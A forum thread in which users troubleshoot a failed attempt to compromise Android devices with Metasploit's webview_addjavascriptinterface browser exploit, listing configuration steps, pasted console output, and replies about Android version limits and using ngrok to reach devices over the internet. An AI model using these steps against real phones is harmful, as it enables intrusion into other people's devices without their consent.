Forum Thread: Trying to Get into My Android Device on Metasploit?

So I tried getting into my Android device (phone & tablet but it still didn't work) I'll post here what I did:

  1. I ran Metasploit
  1. Used this exploit "use exploit /android/browser/webview_addjavascriptinterface".
  1. I set my LHOST to the IP ADRESS on Kali (ifconfig)
  1. Set URIPATH: Security
  1. Exploit.
  1. Got my Local IP "http://192.168.X.X:8080/Security " I even tried the "Using URL" (http://0.0.0.0:8080/Security) but it didn't work.

7.All I got was:

msf exploit(webview_addjavascriptinterface) > * Using URL: http://0.0.0.0:8080/Security
* Local IP: http://192.168.X.X:8080/Security
* Server started.
* 192.168.X.1 webview_addjavascriptinterface - Gathering target information for 192.168.X.1
* 192.168.X.1 webview_addjavascriptinterface - Sending HTML response to 192.168.X.1

! 192.168.X.1 webviewaddjavascriptinterface - Exploit requirement(s) not met: vulntest. For more info: http://r-7.co/PVbcgx

! 192.168.X.1 webview_addjavascriptinterface - No vulnerable Java objects were found in this web context.

5 Responses

So what if the target is an Android 5.2 or higher?
And i also discovered that they must be on the same network connection before it will work.

same problem???????? I used above suggestion but it also does not work

you can use it on wan using http ngrok but you can't hack any android device,must be under 4.2 android version

I get this error
Exploit failed bad-config: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080)

Share Your Thoughts

  • Hot
  • Active